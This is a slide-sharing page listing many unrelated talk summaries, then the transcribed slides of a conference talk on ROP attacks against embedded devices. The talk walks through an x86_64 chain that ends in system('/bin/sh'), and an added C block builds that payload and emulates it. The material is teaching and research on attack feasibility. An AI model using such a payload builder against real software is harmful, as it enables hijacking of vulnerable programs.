Yuuma Taki is a 4th-year student in the Faculty of Information Media at Hokkaido Information University.
At university he focuses on security for lower-level components such as the OS and CPU. In his third year as an undergraduate he worked on implementing the OS security mechanism KASLR at Sechack365.
Currently he is studying ROP-derived techniques and embedded-device security.
Similar to [cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-spec embedded devices- by Yuuma Taki
ARM Ltd designs ARM processor cores and licenses them to partners. It also develops software and peripherals to assist with implementing the ARM architecture. The document discusses ARM's business model, processor modes, register organization, instruction sets, conditional execution, and branch instructions of the ARM architecture. It provides an overview of the key components and evolution of the ARM architecture.
Introduction in Security given by Bart Van Bos at Nalys.
Topics:
- Buffer overflows in C
- Counter measures
- Live demo of 2 attacks
- Shellcode generation
This document discusses techniques for abusing the Intel paging mechanism on Windows to achieve arbitrary write capabilities despite modern kernel protections. It describes how the HAL's heap can be accessed from user mode by modifying page table entries, allowing kernel pointers to be leaked. It also explains how spraying process memory with fake page directories can cause physical memory exhaustion and potentially lead to arbitrary writes if a sprayed page is mapped. Live demos are promised for Windows and Linux attacks.
The CPU, or processor, carries out the instructions of a computer program and is the primary component responsible for a computer's functions. As microelectronic technology advanced, more transistors were placed on integrated circuits, decreasing the number of chips needed for a complete CPU. Processor registers provide the fastest way for a CPU to access data and are located at the top of the memory hierarchy. Common processor architectures include the ARM architecture which has influenced the design of many CPUs due to its low power consumption and flexibility.
The document discusses the ARM architecture and interrupt handling. It provides background on ARM and compares RISC and CISC architectures. It describes ARM's instruction sets, data sizes, registers including the program counter and current program status register. It discusses exception handling in ARM, including saving state on exception entry and exit. Interrupts and exceptions are compared to system calls. Memory organization during exceptions is also covered.
We show that it is possible to write remote stack buffer overflow exploits without possessing a copy of the target binary or source code, against services that restart after a crash. This makes it possible to hack proprietary closed-binary services, or open-source servers manually compiled and installed from source where the binary remains unknown to the attacker. Traditional techniques are usually paired against a particular binary and distribution where the hacker knows the location of useful gadgets for Return Oriented Programming (ROP). Our Blind ROP (BROP) attack instead remotely finds enough ROP gadgets to perform a write system call and transfers the vulnerable binary over the network, after which an exploit can be completed using known techniques. This is accomplished by leaking a single bit of information based on whether a process crashed or not when given a particular input string. BROP requires a stack vulnerability and a service that restarts after a crash. The attack works against modern 64-bit Linux with address space layout randomization (ASLR), no-execute page protection (NX) and stack canaries.
The document discusses bypassing address space layout randomization (ASLR) on Linux. It begins with a refresher on buffer overflows and modern protections like ASLR and DEP. It then explores finding fixed addresses in the .text section that are not subject to ASLR to redirect execution, such as calls and jumps to registers. The document shows searching binaries for these instruction sequences and checking register values to leverage them for exploiting a vulnerable program while ASLR is enabled.
OSPFv2 is a link-state routing protocol that runs on IP and uses protocol number 89. It supports areas, authentication, and route redistribution. On IOS-XR, OSPFv2 uses a hierarchical CLI with inheritance and multiple threads to handle different tasks like packet processing, route installation, and neighbor synchronization. Key differences between IOS and IOS-XR include the use of inheritance and the hierarchical organization of OSPFv2 configuration.
The document discusses various techniques for deception and bypassing security checks, including:
1) Using iptables and the TARPIT and DELUDE targets to deceive port scanners by simulating open ports or terminating connections.
2) Writing x64 shellcode and understanding differences from x86 in CPU registers and the kernel ABI.
3) Performing DL-injection attacks by injecting a dynamic library to override functions like getuid() and bypass authentication.
4) Demonstrating process hijacking using ptrace() to inject shellcode and escalate privileges.
5) Mounting a local privilege escalation attack after gaining initial user access.
ARM (Advanced RISC Machine) is one of the most licensed, and therefore most widespread, processor cores in the world. It is used especially in portable devices because of its low power consumption and reasonable performance. Several interesting extensions are available, such as the THUMB instruction set and the Jazelle Java machine.
This document provides an overview of the ARM processor architecture. It discusses key aspects of ARM including:
- ARM's RISC load/store architecture with fixed-length 32-bit instructions.
- Its pipeline structure which breaks instructions into stages to allow for parallel execution.
- Operating modes like user, system, fast interrupt, and interrupt request that determine privileges.
- Support for exceptions and interrupts.
- Instruction sets including the main 32-bit ARM set and compressed 16-bit Thumb set.
- Popular ARM processor families and cores like ARM7, ARM9, ARM11, Cortex-A, Cortex-M, and features between versions.
The OpenCSD library for decoding CoreSight traces has reached the point where it is ready to be integrated into applications. This session will present an overview of the state of the library, its interfaces and explore and demonstrate a sample integration with perf.
Controlling PC on ARM using Fault Injection (Riscure)
The slides from the presentation by Riscure's Niek Timmers, Albert Spruyt and Marc Witteman. The paper describes an ARM-specific fault injection attack strategy for exploiting embedded systems where externally controlled data is loaded into the program counter (PC) register of the processor.
ARM Ltd designs ARM processor cores and licenses them to semiconductor companies. It also develops software and hardware tools to support the ARM architecture. The document discusses ARM's business model, the ARM programmer's model including instruction sets, register sets, processor modes and exception handling, and how various ARM instructions work.
eBPF has 64-bit general purpose registers, so 32-bit architectures normally need to model each of them with a register pair and generate extra instructions to manipulate the high 32 bits of the pair. Some of this overhead could be eliminated if the JIT compiler knew that only the low 32 bits of a register are of interest. This can be determined through data flow (DF) analysis techniques: either the classic iterative DF analysis or a "path-sensitive" version based on the verifier's code path walker.
In this talk, implementations of both versions of the DF analyzer will be presented. We will first see how a def-use chain based classic eBPF DF analyser looks, and see the possibility of integrating it with the previously proposed eBPF control flow graph framework to make a stand-alone eBPF global DF analyser that could potentially serve as a library. Then, another "path-sensitive" DF analyser based on the existing verifier code path walker will be presented. We will discuss how function calls, path pruning and path switching affect the implementation. Finally, we will summarize the pros and cons of each, and see how each of them could be adapted to 64-bit and 32-bit architecture back-ends.
Also, eBPF has 32-bit sub-registers with associated ALU32 instructions; enabling them (-mattr=+alu32) in LLVM code-gen could let the generated eBPF sequences carry more 32-bit information, which could potentially ease the flow analysis. This will be briefly discussed in the talk as well.
1. Embedded C requires compilers to create files that can be downloaded and run on microcontrollers, while C compilers typically generate OS-dependent executables for desktop computers.
2. Embedded systems often have real-time constraints and limited memory/power that are usually not concerns for desktop applications.
3. Programming for embedded systems requires optimally using limited resources and satisfying real-time constraints, which is done using the basic C syntax and function libraries but with an embedded/hardware-oriented mindset.
The document provides an introduction and overview of ARM processors. It discusses the background and architecture of ARM, including that ARM is a RISC processor designed for efficiency. It also describes some key features of ARM including Thumb mode, different memory banks, and specialized instructions. The document then discusses ARM concepts such as the ARM instruction set and assembly language programming.
ARM Ltd designs ARM processor cores and licenses them to semiconductor companies. It also develops software and hardware tools to support the ARM architecture. The ARM architecture uses 32-bit RISC instructions and has 7 processor modes. It supports conditional execution, uses a barrel shifter as part of data processing instructions, and provides various branch instructions for flow control.
Originally conceived as a processor for desktop systems, ARM processors are now widely used in embedded applications and markets. Some significant products that used ARM processors include the Apple Newton PDA (ARM6 core), Apple iPod (ARM7 core), and Apple iPhone and Nokia N93/N100 (ARM11 core). ARM processors are based on reduced instruction set computer (RISC) architecture. They are designed for low power consumption applications like mobile devices. Some key features of ARM processors include 32-bit instruction set with 16-bit Thumb extension, unified memory address space, and relatively low power consumption.
Smash the Stack: Writing a Buffer Overflow Exploit (Win32) (Elvin Gentiles)
This document provides an overview of buffer overflow exploits on Windows 32-bit systems. It discusses the lab environment that will be used, basic assembly concepts like registers and instructions, the Windows 32 memory layout, how the stack works, and the general steps for exploit development. These include causing a crash, identifying the offset, determining bad characters, locating space for shellcode, generating shellcode, and redirecting execution to the shellcode. The document concludes by listing some hands-on exercises that will be covered, and recommending additional learning materials on exploit writing.
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo... (CODE BLUE)
It started with computer hacking and Japanese linguistics as a kid. Zach Mathis has been based in Kobe, Japan, and has performed both red team services and blue team incident response and defense consultation for major global Japanese corporations since 2006. He is the founder of Yamato Security, one of the largest and most popular hands-on security communities in Japan, and has been providing free training since 2012 to help improve the local security community. Since 2016, he has been teaching security for the SANS Institute and holds numerous GIAC certifications. Currently, he is working with other Yamato Security members to provide free and open-source security tools to help security analysts with their work.
[cb22] Tales of 5G hacking by Karsten Nohl (CODE BLUE)
An expert in mobile network security provided a summary of hacking 5G networks. Some key points include:
1) Standard IT security techniques uncovered issues when applied to upgraded legacy 4G networks, such as unpatched operating systems, weak configurations, and lack of encryption.
2) Future 5G networks introduce new security risks due to increased complexity from virtualization and automation layers, as well as a continuously evolving attack surface extending into cloud infrastructure.
3) Red team exercises show that hacking mobile networks has become a multi-step process, where initial access through one vulnerability can enable lateral movement and privilege escalation to compromise critical systems or customer data.
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A... (CODE BLUE)
The printer has become one of the essential devices on the corporate intranet over the past few years, and its functionality has also increased significantly. Beyond printing and faxing, cloud printing services such as AirPrint are also supported to make it easier to use. Direct printing from mobile devices is now a basic requirement in the IoT era. We also use it to print internal business documents of the company, which makes it even more important to keep the printer safe.
Nowadays, most of the printers on the market do not have to be connected with USB or traditional cable. As long as you are using a LAN cable connected to the intranet, the computer can find and use the printer immediately. Most of them are based on protocols such as SLP and LLMNR. But is it really safe when vendors adopt those protocols? Furthermore, many printers do not use traditional Linux systems, but use RTOS(Real-Time Operating System) instead, how will this affect the attacker?
In this talk, we will use Canon ImageCLASS MF644Cdw and HP Color LaserJet Pro MFP M283fdw as case study, showing how to analyze and gain control access to the printer. We will also demonstrate how to use the vulnerabilities to achieve RCE in RTOS in unauthenticated situations.
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter... (CODE BLUE)
While hackers have known the importance of sharing research to improve security for years, the importance of coordinated vulnerability disclosure is increasingly recognized by governments around the world. The principles of disclosure and protecting security researchers are common across borders, but different countries have some key differences. This panel will present a global perspective that may in turn inform key public policy and company behavior.
ENISA published 'Coordinated Vulnerability Disclosure policies in the EU' in April 2022. This report not only provides an objective introduction to the current state of coordinated vulnerability disclosure policies in the Member States of the European Union, but also introduces the operation of vulnerability disclosure in China, Japan and the USA. Based on these findings, the desirable and good-practice elements of a coordinated vulnerability disclosure process are examined, followed by a discussion of the challenges and issues.
This session aims to share the contents of this report and clarify the challenges and future direction of operations in Japan, as well as national security and vulnerability handling issues in the US, in a panel discussion with representatives from various jurisdictions.
The panelists are involved in the practice of early warning partnership notified bodies in Japan, the authors of the above report in Europe and the contributors to the above report in the US.
In Japan, the issues of system awareness, incentives, increase in the number of outstanding cases in handling and so-called triage in handling vulnerabilities will be introduced.
From the United States, the Vulnerabilities Equities Process for National Security and the publication of a non-prosecution policy for vulnerability research will be introduced, as well as a historical background on the issue.
The aim is that the panel discussion will enable the audience to understand the international situation surrounding CVD, as well as future trends, in particular the important role of vulnerability in cybersecurity and the challenges faced by society around it.
[cb22] Under the hood of Wslink's multilayered virtual machine en by Vladisla... (CODE BLUE)
In October 2021, we published the first analysis of Wslink, a unique loader likely linked to the Lazarus group. Most samples are packed and protected with an advanced virtual machine (VM) obfuscator; the samples contain no clear artifacts and we initially did not associate the obfuscation with a publicly known VM, but we later managed to connect it to CodeVirtualizer. This VM introduces several additional obfuscation techniques such as insertion of junk code, encoding of virtual operands, duplication of virtual opcodes, opaque predicates, merging of virtual instructions, and a nested VM.
Our presentation analyzes the internals of the VM and describes our semi-automated approach to "see through" the obfuscation techniques in reasonable time. We demonstrate the approach on some bytecode from a protected sample and compare the results with a non-obfuscated sample, found after starting our analysis, confirming the method's validity. Our solution is based on a known deobfuscation method that extracts the semantics of the virtual opcodes, using symbolic execution with simplifying rules. We further treat the bytecode chunks and some internal constructs of the VM as concrete values instead of symbolic ones, enabling the known deobfuscation method to deal with the additional obfuscation techniques automatically.
[cb22] CloudDragon's Credential Factory is Powering Up Its Espionage Activiti... (CODE BLUE)
Kimsuky is a North Korean APT possibly controlled by North Korea's Reconnaissance General Bureau. Based on reports from the Korea Internet & Security Agency (KISA) and other vendors, TeamT5 identified that Kimsuky's most active group, CloudDragon, built a workflow functioning as a "Credential Factory," collecting and exploiting these massive credentials.
The credential factory powers CloudDragon to start its espionage campaigns. CloudDragon's campaigns have aligned with DPRK's interests, targeting the organizations and key figures playing a role in the DPRK relationship. Our database suggested that CloudDragon has possibly infiltrated targets in South Korea, Japan, and the United States. Victims include think tanks, NGOs, media agencies, educational institutes, and many individuals.
CloudDragon's "Credential Factory" can be divided into three small cycles: the "Daily Cycle," the "Campaign Cycle," and the "Post-exploit Cycle." The "Daily Cycle" collects massive numbers of credentials and uses the stolen credentials to accelerate its APT life cycle.
In the "Campaign Cycle," CloudDragon develops a lot of new malware. While responding to CloudDragon's incidents, we found that the actor still relied on BabyShark malware. CloudDragon once used BabyShark to deploy a new browser-extension malware targeting victims' browsers. Moreover, CloudDragon is also developing a shellcode-based malware, Dust.
In the "Post-exploit Cycle," the actor relied on hacking tools rather than malicious backdoors. We also identified that the actor used remote desktop software to prevent detection.
In this presentation, we will go through some of the most significant operations conducted by CloudDragon, and more importantly, we will provide possible scenarios of future invasions for defense and detection.
[cb22] From Parroting to Echoing: The Evolution of China's Bots-Driven Info... (CODE BLUE)
Social media is no doubt a critical battlefield for threat actors to launch InfoOps, especially in a critical moment such as wartime or the election season. We have seen Bot-Driven Information Operations (InfoOps, aka influence campaign) have attempted to spread disinformation, incite protests in the physical world, and doxxing against journalists.
China's Bots-Driven InfoOps, despite operating on a massive scale, are often considered to have low impact and very little organic engagement. In this talk, we will share our observations on these persistent Bots-Driven InfoOps and dissect their harmful disinformation campaigns circulated in cyberspace.
In the past, most bots-driven operations simply parroted the narratives of the Chinese propaganda machine, mechanically disseminating the same propaganda and disinformation artifacts made by Chinese state media. Recently, however, we saw newly created bots turn to posting artifacts in a livelier manner. They used various tactics, including reposting screenshots of forum posts and disguising themselves as members of the "Milk Tea Alliance," to create a false appearance that such content is being echoed across cyberspace.
We particularly focus on an ongoing Chinese bots-driven InfoOp targeting Taiwan, which we dub "Operation ChinaRoot." Starting in mid-2021, the bots have been disseminating manipulated information about Taiwan's local politics and Covid-19 measures. Our further investigation has also identified the linkage between Operation ChinaRoot and other Chinese state-linked networks such as DRAGONBRIDGE and Spamouflage.
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of "gimpfuzzy"... (CODE BLUE)
Malware written in Go is increasing every year. Go's cross-platform nature makes it an opportune language for attackers who wish to target multiple platforms. On the other hand, its statically linked libraries make it difficult to distinguish user functions from library code, which makes the binaries hard for analysts to analyze. This situation has increased the demand for Go malware classification and exploration.
In this talk, we will demonstrate the feasibility of computing similarity and classification of Go malware using a newly proposed method called gimpfuzzy. We have implemented "gimpfuzzy", which incorporates Fuzzy Hashing into the existing gimphash method. In this talk, we will verify the discrimination rate of the classification using the proposed method and confirm the validity of the proposed method by discussing some examples from the classified results. We will also discuss issues in Go-malware classification.
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat... (CODE BLUE)
This document discusses the results of long-term scanning and analysis of Winnti 4.0 and ShadowPad malware command and control (C2) protocols. It finds that Winnti 4.0 C2s primarily use TLS, HTTPS, and HTTP, while ShadowPad variants primarily use TCP, HTTPS, and HTTP. Analysis of the protocols reveals encryption methods, packet structures, and server-side functionality. Over time, the number and distribution of active C2s changed, likely in response to research publications and incident response actions. The document advocates for anonymization techniques and merits and risks of future research publications.
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu... (CODE BLUE)
We are swamped with new types of malware every day. The goal of malware analysis is not to reveal every single detail of the malware. It is more important to develop tools for efficiency or introduce automation to avoid repeating the same analysis process. Therefore, malware analysts usually develop tools and build analysis systems themselves. On the other hand, such tool development and system maintenance cost a lot. Incident trends change daily and malware keeps evolving, and it is not easy to keep up with new threats. Malware analysts spend a long time maintaining their analysis systems, which reduces the time available for the analysis of new types of malware that is actually needed.
To solve these problems, we incorporate DevOps practices into malware analysis to reduce the cost of system maintenance by using CI/CD and Serverless. This presentation shares our experience on how CI/CD, Serverless, and other cloud technologies can be used to streamline malware analysis. Specifically, the following case studies are discussed.
* Malware C2 Monitoring
* Malware Hunting using Cloud
* YARA CI/CD system
* Malware Analysis System on Cloud
* Memory Forensic on Cloud
Through the above case studies, we will share the benefits and tips of using the cloud and show how to build a similar system using Infrastructure as Code (IaC). The audience will learn how to improve the efficiency of malware analysis and build a malware analysis system using Cloud infrastructure.
[cb22] What I learned from the direct confrontation with the adversaries who ... (CODE BLUE)
In November 2019, I started monitoring the Bitcoin operation by the adversaries who hid IP addresses of their C&C server in the blockchain. In June 2020, I started collaborating with Professor Christian Doerr of the Hasso Plattner Institute based on the idea of redirecting C&C server communication to a sinkhole server (called takeover), and we successfully achieved this in August. However, the adversaries quickly took evasive action, where they managed to implement an evasion mechanism in only two weeks and restarted their attack. Although we could not conduct our takeover, our monitoring system could work well. The end of their attack was brought upon by the surge in Bitcoin prices. Due to the fees for the Bitcoin miners, a transaction had reduced the adversaries' profits, and we confirmed the last C&C update was in January 2021 and the abandonment of the attack infrastructure came in March. Since then, no similar attacks have been observed by my monitoring system.
Although this attack has already concluded and is unlikely to restart unless the value of Bitcoin declines, I would like to share the know-how I have learned through the direct confrontation with the adversaries. That is, at the time of the confrontation with them, this attack was highly novel, and the adversaries themselves did not fully understand the best solution for its operation. They needed to evolve their tactics, techniques, and procedures (TTPs) while operating the system. We carefully analyzed their TTPs and tried to catch them off their guard. Even more troublesome was the need to understand as quickly as possible what they intended to do each time they were affected by the Bitcoin halving or making a simple operational error. This presentation is a culmination of my insights learned from interactions with these adversaries and I am looking forward to sharing this information with everyone.
A study on drug utilization evaluation of bronchodilators using DDD methodDr. Chihiro
The abstract was published as a conference proceeding in a Newsletter after being presented as an e-posture and secured 2nd prize during the scientific proceedings of "National Conference on Health Economics and Outcomes Research (HEOR) to Enhance Decision Making for Global Health" held at Raghavendra Institute of Pharmaceutical Education and Research (RIPER)- Autonomous in association with the International Society for Pharmacoeconomics and Outcomes Research (ISPOR)-India Andhra Pradesh Regional Chapter during 4th& 5th August 2023.
Nasir A. A study on drug utilization evaluation of bronchodilators using the DDD method. RIPER - PDIC Bulletin ISPOR India Andhra Pradesh Regional Chapter Newsletter [Internet]. 2023 Sep;11(51):14. Available from: www.riper.ac.in
Destyney Duhon personal brand explorationminxxmaree
Destyney Duhon embodies a singular blend of creativity, resilience, and purpose that defines modern entrepreneurial spirit. As a visionary at the intersection of artistry and innovation, Destyney fearlessly navigates uncharted waters, sculpting her journey with a profound commitment to authenticity and impact.This Brand exploration power point is a great example of her dedication to her craft.
stackconf 2024 | Using European Open Source to build a Sovereign Multi-Cloud ...NETWAYS
The European Commission has clearly identified open source as a strategic tool for bringing some balance to an EU cloud market currently dominated by a handful of non-EU hyperscalers. Part of that commitment comes through a series of ambitious, multi-million EU projects like the SIMPL platform for Data Spaces and the multi-country “Important Project of Common European Interest on Next Generation Cloud Infrastructure and Services” (IPCEI-CIS). For the first time in the history of the European Union, it is the EU industry who will be leading large-scale open source projects aimed at building European strategic technologies. In this talk we will explain in detail how specific European open source technologies are being brought together as part of some of those projects to start building Sovereign Multi-Cloud solutions that ensure interoperability and digital sovereignty for European users while preventing vendor lock-in in the cloud market, opening up competition in the emerging 5G/edge.
Call India AmanTel allows you to call from any country in the world including India to the USA and Canada at the cheapest rate Limited offers new users some free minutes.
stackconf 2024 | On-Prem is the new Black by AJ JesterNETWAYS
In a world where Cloud gives us the ease and flexibility to deploy and scale your apps we often overlook security and control. The fact that resources in the cloud are still shared, the hardware is shared, the network is shared, there is not much insight into the infrastructure unless the logs are exposed by the cloud provider. Even an air gap environment in the cloud is truly not air gapped, it’s a pseudo-private network. Moreover, the general trend in the industry is shifting towards cloud repatriation, it’s a fancy term for bringing your apps and services from cloud back to on-prem, like old school how things were run before the cloud was even a thing. This shift has caused what I call a knowledge gap where engineers are only familiar with interacting with infrastructure via APIs but not the hardware or networks their application runs on. In this talk I aim to demystify on-prem environments and more importantly show engineers how easy and smooth it is to repatriate data from cloud to an on-prem air gap environment.
stackconf 2024 | Buzzing across the eBPF Landscape and into the Hive by Bill ...NETWAYS
The buzz around the Linux kernel technology eBPF is growing quickly and it can be hard to know where to start or how to keep up with this technology that is reshaping our infrastructure stack. In this talk, Bill will trace how he got into eBPF, explore some of the applications leveraging eBPF today, and teach others how to dive into the hive of activity around eBPF. People just beginning with eBPF will learn how eBPF makes it possible to have efficient networking, observability without instrumentation, effortless tracing, and real-time security (among other things) without needing your own kernel team. Those already familiar with eBPF will get an overview of the eBPF landscape and learn about many new and expanding eBPF applications that allow them to harness the power without needing to dive into the bytecode. The audience will walk away with an understanding of the buzz around eBPF and knowledge of new tools that may solve some of their problems in networking, observability, and security.
Risks & Business Risks Reduce - investment.pdfHome
In this presentation, I have shown major risks that are to face in a business investment. Also I have shown their classification and sources.
This information have taken from my text book -" Investment Analysis and Portfolio Management ~chapter 2 Investment~ " For complete this Presentation I used Figma and Canva.
My Role:
a. Student Final year - Accounting
b. Presentation Designer
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-spec embedded devices- by Yuuma Taki
1. Are Embedded Devices Ready for ROP Attacks?
-ROP verification for low-spec embedded devices-
YUUMA TAKI
2. Self introduction
Yuuma Taki
・Hokkaido Information University, Department of Information Media, senior (4th year)
・Interested in lower-layer security around the OS and CPU.
Researched KASLR deployment using Prekern at SecHack365 (a Japanese security hackathon).
3. Overview
・Investigate the feasibility of ROP attacks against OSs and processors used in embedded systems.
→ Run vulnerable test programs on the embedded system and launch a ROP attack against them (details later).
→ Emulate both high-spec and low-spec embedded devices using QEMU.
4. Background
・Demand for embedded systems is increasing radically with the proliferation of IoT devices.
→ Because of the constraints of some embedded devices, rich security mechanisms cannot be deployed on them.
(Figure: low-spec devices have low processing power, small memory capacity and low electricity consumption; high-spec devices have high processing power, large capacity and high electricity consumption.)
5. Background
・Evolution of Return Oriented Programming (ROP) attacks
→ A ROP attack chains short instruction sequences that already exist inside a program (gadgets) to perform arbitrary computation.
→ Derivative techniques of ROP are being researched.
・ROP attacks apply to many architectures.
6. Previous Research
A ROP countermeasure:
Implementing security controls such as Control-Flow Integrity.
Drawback:
High runtime cost of the security controls.
→ Implementing such controls on low-spec embedded devices is difficult.
7. This Research
・Investigate embedded devices that have no ROP countermeasures.
・Devise a new countermeasure that can be implemented on low-spec embedded devices.
8. ROP Overview
・What is ROP (Return Oriented Programming)?
→ An attack method devised to circumvent the NX bit security control.
・No eXecute bit (NX bit)
→ Security control that marks data pages such as the heap and stack non-executable.
This hinders the classic attack of injecting shellcode through a stack overflow and jumping to it, because the injected bytes are never executable.
9. Visualizing ROP
・ROP Attack
→ Trigger code execution by chaining code fragments called gadgets into a ROP chain.
(Figure: the code region of an ordinary executable contains instruction fragments 1 to 6. The attacker collects the fragments needed for the attack, here fragments 1, 3, 5 and 6, and embeds their addresses, in that order, into the ROP chain placed in the data region. Only addresses are written; no new code is injected, which is why the NX bit does not stop it.)
10. ROP on x86_64
・Goal: execute system("/bin/sh") to take control.
Assembly instructions used
pop xxx: load the 8-byte value at the top of the stack ([rsp]) into register xxx, then rsp += 8
ret: equivalent to pop rip (the next instruction address is taken from the stack top)
Assembly code (gadgets found in the executable)
0x400100: pop rdi
0x400102: ret
:
0x400200: pop rsi
0x400202: ret
:
0x400300: pop rdx
0x400302: ret
:
Stack region of the vulnerable function (low to high address)
buf (0x10)       <- rsp
saved rbp        <- rbp
Return Address   <- rbp + 8
・・・
Registers
rdi: parameter 1
rsi: parameter 2
rdx: parameter 3
rip: address of the next instruction to execute
rbp: base of the current stack frame (locals are below it, the return address is at rbp + 8)
rsp: address of the stack top
11. ROP on x86_64
・Write the ROP chain by filling the stack with 'A' up to the return address (0x10 bytes of buf plus 8 bytes of saved rbp, 24 bytes in total), then place the chain where the return address was.
(The gadget listing, stack layout and register table are the same as on slide 10.)
12. ROP on x86_64
・After embedding the ROP chain, the stack looks like this (low to high address):
AAAAAAAA            (buf)
AAAAAAAA            (buf)
AAAAAAAA            (saved rbp, now 0x4141414141414141)
0x400100            (return address -> pop rdi; ret)
"/bin/sh" address
'system' actual address
(Gadgets and register roles as on slide 10; rsp still points at buf while the function runs.)
13. ROP on x86_64
・Right after the function epilogue (pop rbp; ret):
pop rbp consumed the overwritten saved rbp, and ret consumed the overwritten return address.
Registers
rdi: parameter 1 (not yet set)
rip: 0x400100
rbp: 0x4141414141414141
rsp: now points at the "/bin/sh" address slot
14. ROP on x86_64
・At the time pop rdi executes:
The stack top, the "/bin/sh" address, is stored into rdi, and rsp moves up one slot.
Registers
rdi: "/bin/sh" address
rip: 0x400102 (the gadget's ret)
rbp: 0x4141414141414141
rsp: now points at the 'system' actual address slot
15. ROP on x86_64
・At the time ret executes:
ret loads the 'system' actual address from the stack top into rip, so execution continues in system() with rdi = "/bin/sh".
Registers
rdi: "/bin/sh" address
rip: 'system' actual address
rbp: 0x4141414141414141
rsp: past the end of the chain
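The chain from slides 10 to 15, as an added worked example in C that is not part of the original slides: build_rop_chain lays out the payload as drawn (24 bytes of 'A', then the pop rdi; ret gadget at 0x400100, the "/bin/sh" address and system's address), and emulate_chain replays the epilogue and the gadgets with the real semantics of pop (load [rsp], then rsp += 8) and ret (pop rip), so the register states of slides 13 to 15 can be checked. The gadget addresses 0x400100/0x400102 are taken from the slides; the "/bin/sh" and system addresses are placeholders to be replaced with values from the target (leaked, or read from a non-ASLR libc), and the optional extra ret gadget is a practitioner's addition for stack alignment, not something the slides show.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Frame layout of the vulnerable function from the slides: buf (0x10) | saved rbp (8) | return address. */
#define BUF_SIZE 0x10u
#define PADDING  (BUF_SIZE + 8u)      /* bytes of 'A' needed to reach the return address */

/* Gadget addresses as drawn on the slides. */
#define POP_RDI_RET 0x400100ull        /* pop rdi ; ret */
#define RET_ONLY    0x400102ull        /* the trailing ret of the same gadget, usable on its own */

static void put64(uint8_t *p, uint64_t v)
{
    for (int i = 0; i < 8; i++) p[i] = (uint8_t)(v >> (8 * i));   /* little-endian */
}

static uint64_t get64(const uint8_t *p)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | p[i];
    return v;
}

/*
 * Build the payload: 'A' * 24 | pop rdi;ret | &"/bin/sh" | [ret] | system.
 * binsh and system_addr are placeholders for what the target leaks or links to.
 * With align set, a lone 'ret' is inserted so rsp is 16-byte aligned when system() starts.
 * Returns the payload length, or 0 if it does not fit in cap.
 */
size_t build_rop_chain(uint8_t *out, size_t cap, uint64_t binsh, uint64_t system_addr, bool align)
{
    size_t need = PADDING + 8u * (align ? 4u : 3u);
    if (cap < need) return 0;
    memset(out, 'A', PADDING);
    size_t off = PADDING;
    put64(out + off, POP_RDI_RET); off += 8;
    put64(out + off, binsh);       off += 8;
    if (align) { put64(out + off, RET_ONLY); off += 8; }
    put64(out + off, system_addr); off += 8;
    return off;
}

/* The registers the slides track; rsp is kept as an offset into the payload buffer. */
struct rop_cpu { uint64_t rip, rsp, rbp, rdi; bool ok; };

static bool pop_slot(struct rop_cpu *c, const uint8_t *stack, size_t len, uint64_t *dst)
{
    if (c->rsp + 8 > len) { c->ok = false; return false; }   /* chain runs off the payload */
    *dst = get64(stack + c->rsp);   /* pop: load the value at [rsp] ... */
    c->rsp += 8;                    /* ... then rsp += 8 */
    return true;
}

/*
 * Replay the epilogue (pop rbp ; ret) and the gadgets over the payload, using the
 * semantics of pop and ret (ret is pop rip). Stops when rip reaches system_addr.
 */
struct rop_cpu emulate_chain(const uint8_t *payload, size_t len, uint64_t system_addr)
{
    struct rop_cpu c = { .rsp = BUF_SIZE, .ok = true };      /* epilogue starts with rsp at saved rbp */
    if (!pop_slot(&c, payload, len, &c.rbp)) return c;      /* pop rbp -> 0x4141414141414141 */
    if (!pop_slot(&c, payload, len, &c.rip)) return c;      /* ret     -> 0x400100 */
    for (int steps = 0; c.ok && c.rip != system_addr && steps < 16; steps++) {
        if (c.rip == POP_RDI_RET) {
            if (!pop_slot(&c, payload, len, &c.rdi)) break; /* pop rdi -> &"/bin/sh" */
            c.rip = RET_ONLY;                               /* fall through to the gadget's ret */
        } else if (c.rip == RET_ONLY) {
            if (!pop_slot(&c, payload, len, &c.rip)) break; /* ret: rip = [rsp]; rsp += 8 */
        } else {
            c.ok = false;                                   /* rip left the known gadgets: chain broken */
        }
    }
    return c;
}
```

The align flag matters on real x86_64 targets: the System V ABI requires rsp to be 16-byte aligned immediately before a call, and returning into system() straight from the overflowed frame usually leaves it off by 8, so the SSE stores inside glibc's system() fault; a lone ret consumes one slot and restores the alignment. Note also that the NX bit is irrelevant to this payload: nothing in it is ever executed as code, only addresses are consumed by pop and ret.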
16. Effective Security Countermeasures against ROP①
Address Space Layout Randomization (ASLR):
ASLR is a security mechanism that randomizes the addresses at which program code and data are loaded, which makes locating specific code and data difficult.
KASLR is ASLR applied to the kernel.
17. ASLR
(Figure: the same stack layout and register table as on slide 10, but the gadget listing now reads
??????: pop rdi
??????: ret
??????: pop rsi
??????: ret
??????: pop rdx
??????: ret
instead of 0x400100, 0x400102, 0x400200, 0x400202, 0x400300, 0x400302.)
The addresses of the instructions have been randomized, so a ROP chain cannot be built in advance; the attacker first needs an address leak.
18. Effective Security Countermeasures against ROP②
Control-Flow Integrity (CFI):
Security mechanism that builds a model of the program's legitimate control flow and checks the control flow at execution time against that model, detecting anomalous transfers such as a return into a gadget.
20. ASLR Weaknesses
・On address spaces of 32 bits or fewer, the randomization carries little entropy, so the randomized addresses can be found by brute force or through an address leak.
→ Not realistic to rely on ASLR in low-spec embedded devices with a narrow address space.
21. CFI Weakness
・Resource intensive for the processor, so it requires a high-capability CPU.
→ Difficult to implement on low-spec embedded devices.
22. Details of the ROP evaluation in this research
・Use simple ROP attacks.
→ Find embedded devices that can be taken over with a simple ROP chain.
・Use QEMU to emulate the embedded devices.
→ QEMU lets us inspect the register and memory contents of the guest environment.
28. Examination Results
・Because many security mechanisms such as SSP (Stack Smashing Protector, i.e. stack canaries) and ASLR are active by default, a simple ROP attack does not gain control unless they are made inactive.
29. ROP against Raspberry Pi OS on Arm Cortex-A53
